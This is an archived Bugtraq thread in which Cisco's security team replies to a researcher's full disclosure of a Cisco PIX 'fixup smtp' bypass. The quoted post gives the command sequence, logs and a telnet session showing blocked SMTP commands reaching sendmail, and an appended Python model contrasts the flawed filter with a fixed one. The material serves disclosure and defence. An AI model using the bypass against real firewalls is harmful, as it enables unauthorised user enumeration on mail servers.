Bugtraq mailing list archives

Re: Cisco PIX Firewall (smtp content filtering hack)
From: Lisa Napier <lnapier () CISCO COM>
Date: Tue, 19 Sep 2000 18:30:51 -0700

Hi,

We have been working for some time to repair this defect.  We have a
planned advisory to be posted next week.  We do not yet have fixed code to
address this issue, but expect to shortly -- this is what typically holds
up the advisory process, ensuring that we have a solution to the problem
reported.

Unfortunately this posting does not provide a workaround, nor any real
assistance to customers attempting to protect themselves.

We really appreciate prior notification.  We do work to get vulnerabilities
fixed, and in fact were already working diligently on this one.

Thanks much,

Lisa Napier
Product Security Incident Response Team
Cisco Systems


At 06:27 PM 09/19/2000 +0200, naif wrote:

How to escape the "fixup smtp" of the Cisco PIX Firewall:

The Cisco PIX Firewall normally restricts some protocol commands (HTTP, FTP, SMTP) and manages multisession protocols (H.323, FTP, SQL*Net).
I made some tests on a BSDI 3.0 box running sendmail9, placed in the DMZ.
The PIX version is the latest, 5.2(1)... here is the output of "show ver":
=====================================================
Cisco Secure PIX Firewall Version 5.2(1)

Compiled on Tue 22-Aug-00 23:35 by bhochuli

pixtest1 up 22 days 5 hours

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Enabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited
=======================================================
When a new connection is established, the PIX uses its fixup filter to nullify every command that isn't in its "allowed list" (such as HELO, MAIL FROM:, RCPT TO:, DATA, RSET, QUIT).
For example, following the "security through obscurity" concept, it rewrites the banner of the original MTA.
This is a sendmail...

220 *********************************************************2000
***0******0200 ******

Now, the PIX nullifies the HELP command, and if I write an e-mail to my friend asking for "help", it should drop the line on which I write "help".
So, the Cisco PIX Firewall disables the fixup after the "data" command, until "<CR><LF><CR><LF>.<CR><LF>".
Now what happens if I don't complete the e-mail, or I immediately type "data" in place of the normal "helo, mail from, rcpt to, data, quit"?
The PIX disables the fixup and gives me a direct channel to the MTA without doing any content filtering.

Here is an example of what I could do exploiting this bug:
helo ciao
mail from: pinco () pallino it
data                                 ( From here the PIX disables fixup)
expn guest                           ( Now I could enumerate users
vrfy oracle                             and have access to all commands)
help
whatever command I want
quit

Greetings to Cisco and its Security Products!

Here is the log of my test...

- IP of the client: 10.10.10.10
- Public IP of the server: 10.10.10.2
- Private IP of the server: 172.16.1.2


=====
The sendmail log:

Sep 19 14:06:19 testbox sendmail[14163]: NOQUEUE: Authentication-Warning:
testbox.test.it: [10.10.10.10] didn't use HELO protocol
Sep 19 14:07:36 testbox sendmail[14164]: NOQUEUE: [10.10.10.10]: expn pinco
Sep 19 14:08:03 testbox sendmail[14165]: NOQUEUE: [10.10.10.10]: vrfy pallino
Sep 19 14:08:50 testbox sendmail[14163]: OAA14163:
from=pix () il firewall cattivo it, size=0, class=0, pri=0, nrcpts=0,
proto=SMTP, relay=[10.10.10.10]



=====
Here is the output of "debug fixup tcp" on the PIX:

        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: SYN out rcvd
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: unknown command
        smtp: X-ing ciao pix mi vuoi rispondere?

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: help command
        smtp: nullify <help> command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: mail command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: data command
        smtp: entering data mode

###### From here the PIX thinks that I'm writing the e-mail body, so it disables fixup
###### and I could inject my malicious commands without having them nullified.

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)

Here is the telnet session:

naif:~# telnet  10.10.10.2 25
Trying 10.10.10.2...
Connected to 10.10.10.2.
Escape character is '^]'.
220 *********************************************************2000
***0******0200 ******
ciao pix mi vuoi rispondere?
500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
help
500 Command unrecognized: "XXXX"
mail from: pix () il firewall cattivo it
250 pix () il firewall cattivo it    Sender ok
data
503 Need RCPT (recipient)

#### LOOK, FROM HERE FIXUP IS DISABLED :)))

help
214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs () sendmail org
214-For local information send email to Postmaster at your site.
214 End of HELP info
expn pinco
550 pinco... User unknown
vrfy pallino
550 pallino... User unknown


The End

Greetings to bolo for the PIX and the BSDI box :)
Kiss to my love NaiL^d0d :****


naif

e-mail:`echo "donlayiufhg () wiltoragpyzagvcm wmdnehhqrstzwr" | tr -d \
              'bdghlmoqrsuvwzy'`

:pp

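The post above shows the PIX entering data mode on the client's DATA even though sendmail answered 503 and never left command mode. The following added example (not code from the post or from Cisco) models a minimal SMTP command filter in both forms, the flawed one that trusts the client's DATA alone and a corrected one that waits for the server's 354 reply, and replays the post's session through each; the class, function and list names are assumptions made for illustration.

```python
# Added example, not code from the post or from Cisco; names and ALLOWED are assumptions.
ALLOWED = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}
class SmtpFilter:
    def __init__(self, require_354):
        self.require_354 = require_354  # False models the flaw: DATA alone opens data mode
        self.in_data = self.awaiting_354 = False  # body in transit / DATA unanswered

    def client_line(self, line):
        """Return the text forwarded to the MTA for one client line."""
        if self.in_data:
            if line == ".":
                self.in_data = False  # end of body: back to command mode
            return line
        verb = line.split(None, 1)[0].upper() if line.strip() else ""
        if verb == "DATA":
            if self.require_354:
                self.awaiting_354 = True
            else:
                self.in_data = True
            return line
        if verb in ALLOWED:
            return line
        return "X" * len(line)  # "nullify": overwrite the whole line with X's

    def server_line(self, line):
        """Observe one MTA reply; only a 354 actually opens data mode."""
        if self.awaiting_354:
            self.awaiting_354 = False
            self.in_data = line.startswith("354")
        return line

# Constructed replay of the post's session: the MTA refuses DATA with 503 and
# stays in command mode, while the flawed filter believes a body has begun.
SESSION = [
    ("C", "mail from: pix@firewall.example"),
    ("S", "250 pix@firewall.example    Sender ok"),
    ("C", "data"),
    ("S", "503 Need RCPT (recipient)"),
    ("C", "help"), ("C", "expn pinco"), ("C", "vrfy pallino"),
]

def forwarded_commands(require_354):
    """Lines the MTA actually receives from the client under one filter."""
    f, out = SmtpFilter(require_354), []
    for side, line in SESSION:
        if side == "C":
            out.append(f.client_line(line))
        else:
            f.server_line(line)
    return out
```

With require_354=False the HELP, EXPN and VRFY lines reach the MTA intact, exactly as in the telnet session above; with require_354=True they are X'd out because the 503 reply never opened data mode.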
